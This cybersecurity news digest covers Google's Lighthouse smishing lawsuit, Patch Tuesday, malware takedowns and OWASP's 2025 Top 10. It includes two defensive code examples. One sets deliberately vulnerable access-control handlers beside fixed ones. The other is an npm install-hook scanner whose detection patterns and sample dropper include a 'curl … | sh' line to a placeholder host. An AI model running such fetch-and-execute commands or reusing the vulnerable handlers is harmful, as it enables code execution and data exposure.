Google sues Chinese smishing giant Lighthouse Enterprise for scams across 120 countries
UK proposes new cyberattack defenses, UK to allow tests of AI systems to gauge CSAM potential, Oz spy chief says China probed country's telecom networks, China blames US gov't for $13b LuBian theft, Google unveils Private AI Compute, MSFT issues fixes for 63 flaws, much more

In one of the most high-profile actions against Chinese cyberscammers so far, Google is suing alleged members of one “relentless” Chinese smishing group called the Lighthouse Enterprise that it claims has tried to con people in more than 120 countries around the world.
In a civil lawsuit filed today in the US Southern District of New York, Google alleges that 25 unnamed individuals have operated as part of the “Lighthouse” scam network and targeted millions of Americans with texts in a “staggering” operation.
As well as “stealing” information and money, Lighthouse also “preys on the public trust in Google” by using its logos on fraudulent websites and abusing its systems and technology, the company’s lawsuit claims. “With the rise in scams, it’s largely due to the action of organized crime networks, and most of them are transnational,” Halimah DeLaine Prado, general counsel at Google, alleges. “The Lighthouse network has an enormous reach.”
Central to the Lighthouse operation is its scamming software, called Lighthouse. Cybercriminals developed this software and then sold it as a subscription service to less technically capable fraudsters who use it to send the scam text messages. Scammers can purchase “weekly, monthly, seasonal, annual, or permanent” subscriptions to use the software, Google’s lawsuit claims.
According to Google, the scam exploits the reputations of its own and other brands by illegally displaying Google's trademarks and services on fraudulent websites. Google says it found at least 107 website templates featuring its branding on sign-in screens, designed specifically to trick people into believing the sites are legitimate.
Google's lawsuit against two dozen individuals it says it has linked to the Lighthouse operation describes the broader network as made up of several types of cybercriminals: data brokers, who provide lists of people to target with scams; spammers, who provide the tech needed to send messages en masse; a theft group of individuals using stolen account details to access victims' bank accounts; and administrators who organize the groups. The lawsuit claims the 25 individuals it is targeting have all "participated in the management or operation" of the Lighthouse scheme.
Lighthouse “offers” more than 600 phishing templates that scammers can use to try to steal people’s personal information, Google’s legal filing says. These impersonate more than 400 entities or organizations, the firm says in its lawsuit.
Google claims Lighthouse has harmed over 1 million victims across more than 120 countries, stealing somewhere between 12.7 million and 115 million credit cards in the US alone, representing a five-fold increase in these types of attacks since 2020.
Google cited data from cyber security company Silent Push alleging that in a 20-day period this year a Chinese criminal group called “Smishing Triad” used Lighthouse to make 200,000 fraudulent websites, which received 50,000 visits a day helping compromise millions of US credit cards. (Matt Burgess / Wired)
Related: Google, NPR, CNBC, Financial Times, The Verge, Ars Technica, CBS News
Britain plans to strengthen its public services' defenses against cyberattacks, requiring companies that provide services to private and public sector organisations, such as the National Health Service, to meet strict security standards.
In 2024, hackers breached the Ministry of Defence's payroll system, and other recent attacks included one that disrupted over 11,000 NHS medical appointments and procedures.
The proposals also follow a series of cyberattacks in recent months that disrupted some of Britain's biggest brands, including Marks & Spencer, the Co-op, and Jaguar Land Rover. Under the proposed laws, medium and large companies providing services such as IT management, help desk support, and cybersecurity to both private and public sector organisations would be regulated, the government said.
If approved, the proposals would require companies to promptly report significant or potentially significant cyber incidents to both the government and their customers, and to have robust plans in place to manage the consequences.
Regulators would gain new powers to designate critical suppliers to essential services, and there would be stricter penalties for serious breaches, the UK's Department for Science, Innovation and Technology (DSIT) said.
The government has also set out plans to ban public sector bodies and operators of critical national infrastructure, including the NHS, local councils, and schools, from paying ransom demands to cybercriminals. (Catarina Demony / Reuters)
Related: Bloomberg, GOV.UK, GOV.UK, Invezz, The Cyber Express, UKAuthority
The UK government will allow tech firms and child safety charities to proactively test artificial intelligence tools to make sure they cannot create child sexual abuse imagery.
An amendment to the Crime and Policing Bill announced on Wednesday would enable "authorised testers" to assess models for their ability to generate illegal child sexual abuse material (CSAM) before their release.
Technology Secretary Liz Kendall said the measures would "ensure AI systems can be made safe at the source" - though some campaigners argue more still needs to be done.
It comes as the Internet Watch Foundation (IWF) said the number of AI-related CSAM reports had doubled over the past year. (Liv McMahon / BBC News)
Related: GOV.UK
Mike Burgess, the director general of security for the Australian Security Intelligence Organisation, said hackers working for China's government and military had probed the country's telecoms network and key infrastructure, warning against the risk of economic disruption from sabotage.
Burgess said the espionage was estimated to have cost the country A$12.5 billion ($8.1 billion) last year.
That included the loss of A$2 billion in trade secrets and intellectual property, he told a business conference in Melbourne.
Burgess highlighted the threat of cyber sabotage, describing the activities of the Chinese hacking groups Salt Typhoon and Volt Typhoon, which he described as "hackers working for Chinese government intelligence and their military."
He added, "We have seen Chinese hackers probing our critical infrastructure as well." In Beijing, a foreign ministry spokesperson said Burgess's remarks "spread false narratives and deliberately provoked confrontation." (Kirsty Needham / Reuters)
Related: Livemint, ABC, Australian Financial Review, BBC News, The Guardian, China Daily, Techwire Asia, StratNews Global, Times of India, Financial Review, The Nightly, Sydney Morning Herald, 9News, Brisbane Times
China's National Computer Virus Emergency Response Center accused the US government of orchestrating the theft of about $13 billion worth of Bitcoin from the LuBian Bitcoin mining pool that took place in December 2020.
The hack is likely a “state-level hacker operation” led by the US, according to the cybersecurity agency, which said the quiet and delayed movement of the stolen Bitcoin suggests a government-level action rather than typical criminal behavior.
An agency report links the stolen Bitcoin from LuBian, once one of the most significant Bitcoin mining operations in the world, with tokens that were confiscated by the US government, which the US said are associated with Chen Zhi, the chairman of the Cambodian conglomerate Prince Group. Chen was charged by the US with engaging in a wire-fraud conspiracy and operating a money-laundering scheme in October.
In an Oct. 8 indictment filed against Chen in New York, the US alleged that he and co-conspirators laundered illicit proceeds by using them to fund “large-scale” crypto mining operations, including LuBian. The indictment said addresses associated with LuBian “received large sums of cryptocurrency from sources unrelated to new mining.” (Muyao Shen and Patrick Howell O'Neill / Bloomberg)
Related: National Computer Virus Emergency Response Center, The Cyber Express, Nikkei Asia, NewsBTC, Cryptonews, Bitcoin Magazine, The Block, BeInCrypto, Decrypt, The Coin Republic, Coinpedia Fintech News, Blockonomi, The Register
Google is rolling out a new cloud-based platform called Private AI Compute that lets users unlock advanced AI features on their devices while keeping data private.
The feature, virtually identical to Apple’s Private Cloud Compute, comes as companies reconcile users’ demands for privacy with the growing computational needs of the latest AI applications.
Many Google products run AI features like translation, audio summaries, and chatbot assistants, on-device, meaning data doesn’t leave your phone, Chromebook, or whatever it is you’re using. This isn’t sustainable, Google says, as advancing AI tools need more reasoning and computational power than devices can supply.
The compromise is to ship more difficult AI requests to Private AI Compute, which it describes as a “secure, fortified space” offering the same degree of security you’d expect from on-device processing. Sensitive data is available “only to you and no one else, not even Google.” (Robert Hart / The Verge)
Related: The Keyword, 9to5Google, Ars Technica, SiliconANGLE, Tech Times, Digital Trends, Droid Life, Sherwood News, Mashable, Android Authority, WinBuzzer, CyberInsider, Moneycontrol, Neowin, Digit, r/artificial, r/GooglePixel, Slashdot
Microsoft issued its latest Patch Tuesday update, which includes security updates for 63 flaws, including one actively exploited zero-day vulnerability.
It also addresses four "Critical" vulnerabilities: two remote code execution flaws, one elevation of privilege flaw, and one information disclosure flaw.
The exploited zero day is CVE-2025-62215, a Windows Kernel Elevation of Privilege Vulnerability. Microsoft says that the flaw requires an attacker to win a race condition, upon which they receive SYSTEM privileges.
Microsoft attributed the flaw's discovery to Microsoft Threat Intelligence Center (MSTIC) & Microsoft Security Response Center (MSRC) but has not shared how the flaw was exploited.
Tuesday was also the first extended security update (ESU) for Windows 10, so if you are still utilizing the unsupported operating system, it is strongly advised that you upgrade to Windows 11 or enroll in the ESU program. (Lawrence Abrams / Bleeping Computer)
Related: WinBuzzer, Security Affairs, CSO Online, Zero Day Initiative, Security Week, Windows Central, Rapid7, SANS Internet Storm Center, Ask Woody, CyberScoop, The Stack, Bleeping Computer, PCMag, Windows Latest, How-to-Geek, Windows Report
Google was accused in a lawsuit of using its Gemini AI assistant to unlawfully track the private communications of users of its Gmail, instant messaging, and videoconference programs.
In the past, users of Gmail, Chat, and Meet were given the option to turn on Google’s artificial intelligence program. But in October, the Alphabet Inc. unit “secretly” turned on Gemini for all those applications, enabling it to collect private data “without the users’ knowledge or consent,” according to the complaint, Thele v. Google LLC, 25-cv-09704, filed in federal court in San Jose, California.
While the company allows users to turn off Gemini, they need to dig into Google’s privacy settings to deactivate the AI tool, according to the proposed class-action suit. Unless they take that step, Google uses Gemini to “access and exploit the entire recorded history of its users’ private communications, including literally every email and attachment sent and received in their Gmail accounts,” according to the complaint.
The suit alleges that Google is violating the California Invasion of Privacy Act, a 1967 law that prohibits surreptitious wiretapping and recording of confidential communications without the consent of all parties involved. (Robert Burnson / Bloomberg)
Related: Republic World, The Statesman, Moneycontrol
The Rhadamanthys infostealer operation has been disrupted, likely by law enforcement, with numerous “customers” of the malware-as-a-service reporting that they no longer have access to their servers.
Rhadamanthys is an infostealer malware that steals credentials and authentication cookies from browsers, email clients, and other applications. It is commonly distributed through campaigns promoted as software cracks, YouTube videos, or malicious search advertisements.
Cybersecurity researchers g0njxa and Gi7w0rm, who both monitor malware operations like Rhadamanthys, report that cybercriminals involved in the operation claim that law enforcement gained access to their web panels.
In a post on a hacking forum, some customers state that they lost SSH access to their Rhadamanthys web panels, which now require a certificate to log in rather than their usual root password.
A message from the Rhadamanthys developer says they believe German law enforcement is behind the disruption, as web panels hosted in EU data centers had German IP addresses logging in before the cybercriminals lost access.
Multiple researchers believe this disruption could be related to an upcoming announcement from Operation Endgame, an ongoing law enforcement action targeting malware-as-a-service operations.
Operation Endgame has been behind numerous disruptions since it launched, including against ransomware infrastructure, the AVCheck site, and the SmokeLoader, DanaBot, IcedID, Pikabot, Trickbot, Bumblebee, and SystemBC malware operations.
The Operation Endgame website currently has a timer stating that new action will be disclosed on Thursday. (Lawrence Abrams / Bleeping Computer)

NAS device company Synology addressed a critical-severity remote code execution (RCE) vulnerability in BeeStation products that was demonstrated at the recent Pwn2Own hacking competition.
The security issue (CVE-2025-12686) is described as a ‘buffer copy without checking the size of input’ problem, and can be exploited to allow arbitrary code execution.
It impacts multiple versions of BeeStation OS, the software powering Synology’s network-attached storage (NAS) devices marketed as a consumer-oriented “personal cloud.”
No mitigations are available other than upgrading, so the vendor recommends that users move to the fixed versions of BeeStation OS. (Bill Toulas / Bleeping Computer)
Related: Synology, eSecurity Planet, Hong Kong CERT
Hyundai is alerting millions of customers about a data breach that exposed Social Security numbers and driver's licenses.
The breach, which occurred in February but is only now being disclosed, represents the automotive giant's third major security incident in as many years.
Between February 22 and March 2 of this year, hackers broke into the company's systems and roamed freely for nine days before being detected.
The company discovered the intrusion on March 1st and says it immediately kicked the attackers out and brought in cybersecurity forensics teams. But the investigation took months, and notification letters are only now being sent to those confirmed to be affected, more than seven months after the attack ended. (Lars Daniel / Forbes)
Related: California Attorney General's Office, Car and Driver, Kelley Blue Book, The Drive, Jalopnik
Amazon became the latest company to open its large language models to outside security researchers, announcing the creation of a new bug bounty program for the tech giant’s AI tools with a maximum payout of $25,000 for critical bugs.
The program will allow select third-party researchers and academic teams to prod Nova, Amazon's suite of foundation AI models, and receive compensation for their findings. It will cover a range of common vulnerabilities that affect most generative AI systems: prompt injection, jailbreaking, and vulnerabilities within the model that have "real-world exploitation potential."
Researchers will also look at how the models could be manipulated to assist in the production of chemical, biological, radiological, and nuclear weapons. (Derek B. Johnson / CyberScoop)
In a filing with Maine's Attorney General, digital engineering outfit GlobalLogic says personal data from more than 10,000 current and former employees was exposed in the wave of Oracle E-Business Suite (EBS) attacks attributed to the Clop ransomware gang.
The US-based GlobalLogic said that 10,471 individuals were affected after criminals gained unauthorized access to its systems.
In notification letters sent to those impacted, GlobalLogic admitted the stolen data included names, addresses, Social Security numbers, passport information, and bank account details.
GlobalLogic said its investigation identified the earliest date of criminal activity as July 10, 2025, with the most recent occurring on August 20, 2025. This aligns with findings from Google Threat Intelligence Group (GTIG) and Mandiant, which said that suspicious HTTP traffic targeting Oracle EBS servers began in early July. (Carly Page / The Register)
Related: CyberScoop, Bleeping Computer
The Open Worldwide Application Security Project (OWASP) just published its top 10 categories of application risks for 2025, its first list since 2021. It found that while broken access control remains the top issue, security misconfiguration is a strong second, and software supply chain issues are still prominent.
The update was presented at the organization's Global AppSec USA event. The list is final, but the official write-up is in preview, according to OWASP Top 10 co-leads Neil Smithline and Tanya Janca.
The categories are inevitably imprecise and have been updated for 2025. Software supply chain failures are new, replacing one called "vulnerable and outdated components." Server-side request forgery (SSRF) has been merged with broken access control. A new category has been added for "mishandling of exceptional conditions."
Broken access control is "hands down the #1 category for web apps, APIs, and many other digital systems," according to Smithline and Janca. It impacts 3.73 percent of applications tested. Errors in this category include bypassing access control through URL tampering, APIs with missing access controls, guessing URLs to privileged pages as a standard user, or any violation of the principle of least privilege.
Security misconfiguration is second, and would be top for cloud and infrastructure security, Smithline and Janca said in their presentation. It has risen in the list because of an engineering trend to base security more on configuration than on other methods, OWASP states.
Supply chain failures are third, despite having relatively few occurrences, because issues of this kind have "the highest average exploit and impact scores from CVEs [Common Vulnerabilities and Exposures]", OWASP reports. (Tim Anderson / The Register)
Related: OWASP, Security Week, Red Hot Cyber, Dark Reading, SC Media
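The broken access control failures listed above (URL tampering to reach another user's record, a privileged page reachable by guessing its URL, no server-side check of the principle of least privilege) are easier to recognize side by side in code. The following is an added example written for this summary, not OWASP's own code: a vulnerable object lookup and admin page next to hardened versions that deny by default. The users, roles and document store are constructed sample data, and the two-role model ("user" and "admin") is an assumption for the example.

```python
"""Broken access control: an insecure-direct-object-reference (IDOR) handler
and an unguarded admin page, each beside a hardened version that denies by
default. Added example; not OWASP's code. All data below is constructed."""
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    name: str
    role: str  # assumed roles for the example: "user" or "admin"


# Constructed sample store: doc_id -> (owner, body)
DOCUMENTS = {
    101: ("alice", "alice's payslip"),
    102: ("bob", "bob's payslip"),
}


class AccessDenied(Exception):
    pass


def get_document_vulnerable(caller: User, doc_id: int) -> str:
    """Trusts the doc_id taken from the URL and never checks ownership.
    Any authenticated user can change /docs/101 to /docs/102 and read
    another user's record: the textbook IDOR."""
    owner, body = DOCUMENTS[doc_id]
    return body


def get_document(caller: User, doc_id: int) -> str:
    """Deny by default; release the record only to its owner or an admin."""
    record = DOCUMENTS.get(doc_id)
    if record is None:
        # Same error for "missing" and "forbidden" so ids cannot be enumerated.
        raise AccessDenied("not found or not permitted")
    owner, body = record
    if caller.role != "admin" and caller.name != owner:
        raise AccessDenied("not found or not permitted")
    return body


def admin_dashboard_vulnerable(caller: User) -> str:
    """'Hidden' admin page with no server-side check: guessing the URL is enough."""
    return "admin dashboard"


def admin_dashboard(caller: User) -> str:
    """Server-side role check; an obscure URL is not an access control."""
    if caller.role != "admin":
        raise AccessDenied("admin role required")
    return "admin dashboard"


def demo() -> dict:
    """Run each handler as a standard user and as an admin; return what leaked."""
    alice = User("alice", "user")
    bob = User("bob", "user")
    root = User("root", "admin")
    results = {}
    results["idor_vulnerable"] = get_document_vulnerable(alice, 102)  # leaks bob's record
    try:
        get_document(alice, 102)
        results["idor_fixed"] = "leaked"
    except AccessDenied:
        results["idor_fixed"] = "denied"
    results["own_doc"] = get_document(bob, 102)        # owner still allowed
    results["admin_read"] = get_document(root, 101)    # admin still allowed
    results["admin_page_vulnerable"] = admin_dashboard_vulnerable(alice)
    try:
        admin_dashboard(alice)
        results["admin_page_fixed"] = "leaked"
    except AccessDenied:
        results["admin_page_fixed"] = "denied"
    return results


if __name__ == "__main__":
    for check, outcome in demo().items():
        print(f"{check}: {outcome}")
```

The hardened handlers make the decision on the server from the caller's identity and the record's owner, never from anything the client can edit, and they return the same error for a missing and a forbidden id so a standard user cannot enumerate which ids exist.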

Manassas City Public Schools (MCPS) were closed on Monday due to a cybersecurity incident that has led to connectivity disruptions and phone outages across the school system, officials said.
Dr. Kevin Newman, MCPS superintendent, said in a post on Facebook on Sunday that all MCPS schools will be closed on Monday, November 10, as a precautionary measure to ensure the safety and security of students, teachers, and staff. The school campuses are not at risk, he said.
Tuesday, November 11, was a previously scheduled holiday, and schools are expected to reopen on Wednesday, November 12. (Alan Henney / WJLA)
Related: WUSA, Inside NoVA, Potomac Local News, Prince William Times, DC News Now, Patch
Dutch government bodies were unpleasantly surprised by news that an American tech firm has acquired the Dutch cloud company Solvinity, the Financieele Dagblad reported.
Several governments had opted for working with Solvinity precisely to reduce dependence on American technology firms.
Solvinity works primarily for Dutch government bodies and provides cloud services. The company is involved in managing DigiD and MijnOverheid, among other things. It also provides secure internet access to the Ministry of Justice and Security. The municipality of Amsterdam recently partnered with Solvinity, partly because it wasn’t in American hands. The Dutch Gambling Authority is also a client.
Last week, the American tech company Kyndryl announced it was acquiring Solvinity for an undisclosed amount, proving that even opting for non-American service providers is not a guarantee. The Ministry of Justice and Security told FD that it was investigating “the possible consequences for our collaboration.” Amsterdam said it was “unpleasantly surprised.” (NL Times)
Related: Financieele Dagblad, Dutch News, Innovation Origins
Iran said it had broken up a spy network linked to both Israeli and US spy agencies, months after the war between the Islamic Republic and its archenemy, Israel.
“An anti-security network led by the US and Israeli intelligence services was identified inside the country and dismantled after several stages of observation, surveillance, and other intelligence measures,” the intelligence organization of the Revolutionary Guards said.
“The operation was carried out in a coordinated manner in a number of provinces,” the Islamic Revolutionary Guard Corps (IRGC), the ideological arm of Iran’s military, said in a statement carried by state television.
It did not provide any details on the time or the location of the crackdown, nor the number of arrests. (AFP)
Related: New Arab
Cybersecurity researchers at Veracode thought they discovered a malicious npm campaign that was aimed at stealing critical credentials from GitHub’s own code base, but GitHub confirmed that the npm packages referenced in Veracode’s report were not part of a real malicious campaign but rather a controlled exercise conducted by GitHub’s internal Red Team.
The activity was designed to evaluate internal detection and response capabilities. Veracode’s blog has since been updated to reflect this clarification.
The fake code package was set up to launch a dangerous sequence immediately after installation. It contained a postinstall hook, an npm lifecycle script that runs automatically when the package is installed, which would download and run malware to steal GitHub tokens. (Deeba Ahmed / HackRead)
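Install-time lifecycle scripts are the mechanism the red-team package relied on, and they are something a practitioner can check for before a dependency ever runs. The following is an added example written for this summary, not Veracode's or GitHub's code: it reads a package.json, lists the scripts npm executes during install, and flags indicators typical of a dropper. The two package.json documents are constructed samples, and the indicator list is an assumed starting heuristic, not a complete detector.

```python
"""Flag npm lifecycle scripts that execute at install time and look like
droppers. Added example; not Veracode's or GitHub's code. The sample
manifests and the indicator patterns below are constructed/assumed."""
import json
import re

# npm runs preinstall/install/postinstall automatically on `npm install`
# unless --ignore-scripts is set; prepare also runs for git and local installs.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumed indicators of a dropper: remote fetch piped to a shell, inline JS,
# base64 decoding, and reads of token-bearing environment variables.
RISKY_PATTERNS = {
    "remote_fetch": re.compile(r"\b(curl|wget)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(ba|z)?sh\b"),
    "inline_node": re.compile(r"\bnode\s+-e\b"),
    "base64_decode": re.compile(
        r"base64\s+(-d|--decode)|from\(['\"][A-Za-z0-9+/=]{40,}['\"],\s*['\"]base64"
    ),
    "env_token": re.compile(
        r"\$\{?(GITHUB_TOKEN|GH_TOKEN|NPM_TOKEN|AWS_SECRET_ACCESS_KEY)\b"
    ),
}


def audit_package_json(text: str) -> list[dict]:
    """Return one finding per install-time hook present, with the indicators it matched."""
    pkg = json.loads(text)
    scripts = pkg.get("scripts", {})
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        hits = [name for name, rx in RISKY_PATTERNS.items() if rx.search(cmd)]
        findings.append({"hook": hook, "command": cmd, "indicators": hits})
    return findings


def is_suspicious(findings: list[dict]) -> bool:
    """Any install-time hook with at least one indicator is treated as suspicious."""
    return any(f["indicators"] for f in findings)


# Constructed samples: a benign native build step and a dropper-style postinstall.
BENIGN = json.dumps({
    "name": "good-lib",
    "scripts": {"install": "node-gyp rebuild", "test": "jest"},
})
DROPPER = json.dumps({
    "name": "evil-lib",
    "scripts": {
        "postinstall": "curl -fsSL https://example.invalid/x.sh | sh "
                       "&& node -e \"require('child_process')\"",
    },
})

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("dropper", DROPPER)):
        findings = audit_package_json(doc)
        verdict = "suspicious" if is_suspicious(findings) else "clean"
        print(f"{label}: {verdict} {findings}")
```

A benign native module will legitimately carry an `install` script (for example `node-gyp rebuild`), which is why the audit reports every install-time hook and lets the indicators decide. Installing with `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) prevents all of these hooks from running and is the simplest blanket control for CI runners that hold tokens.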

Best Thing of the Day: Time to Examine the CBO Hack
Now that the US government is open, the House Committee on the Budget will be holding a hearing on oversight of the Congressional Budget Office (CBO), during which a recent and ongoing attack on the CBO by a foreign threat actor will likely be a central topic.
Bonus Best Thing of the Day: An Homage to an Iconic Computer Magazine
Software engineer Hector Dearman released a visualizer that lays out all 287 issues of the iconic and now-defunct BYTE magazine as one giant zoomable map.
Extra Bonus Best Thing of the Day: Helping Those With Nest Devices Abandoned by Google
Cody Kociemba, the developer behind the Hack/House project, has taken it upon himself to maintain aging and now-discontinued Nest devices through a solution called "No Longer Evil," or “NLE” for short.
Worst Thing of the Day: Why Hack When You Can Wait for Employees to Use AI?
According to LayerX's latest Browser Security Report 2025, 77% of employees paste data into AI prompts, and 32% of all copy-pastes from corporate accounts to non-corporate accounts occur within genAI tools.
Worst Thing of the Day: When Cyberattacks Damage GDP
The Bank of England reports that the cyberattack against British car manufacturer Jaguar Land Rover, the country’s largest automaker, has been so catastrophic that it put a dent in the UK's gross domestic product.
Bonus Worst Thing of the Day: What Does This Have to Do With Protecting Children?
The UK's communications regulator, Ofcom, is using an unnamed third-party tool to monitor VPN use in the UK under Britain's push to supposedly protect children online.
Extra Bonus Worst Thing of the Day: Yes, We Know
As anyone in cybersecurity should know by now, online age checking is creating a treasure trove of data for hackers.
Closing Thought
